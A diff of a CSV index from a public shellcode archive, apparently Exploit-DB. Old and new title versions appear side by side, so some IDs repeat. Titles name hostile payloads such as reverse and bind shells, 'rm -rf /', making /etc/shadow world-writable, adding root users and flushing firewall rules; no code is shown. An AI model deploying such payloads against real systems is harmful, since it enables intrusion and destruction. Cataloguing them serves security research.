13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
@ -35,7 +35,7 @@ id,file,description,date,author,type,platform
13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
@ -43,38 +43,38 @@ id,file,description,date,author,type,platform
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
13307,shellcodes/linux_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13320,shellcodes/linux_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86
13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
@ -94,11 +94,11 @@ id,file,description,date,author,type,platform
13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86
13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
@ -115,21 +115,21 @@ id,file,description,date,author,type,platform
13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13375,shellcodes/linux_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13376,shellcodes/linux_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
@ -142,13 +142,13 @@ id,file,description,date,author,type,platform
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -182,7 +182,7 @@ id,file,description,date,author,type,platform
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/linux_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13430,shellcodes/linux_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,linux_x86
@ -191,7 +191,7 @@ id,file,description,date,author,type,platform
13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13439,shellcodes/linux_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,linux_x86
@ -203,8 +203,8 @@ id,file,description,date,author,type,platform
13445,shellcodes/linux_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13446,shellcodes/linux_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
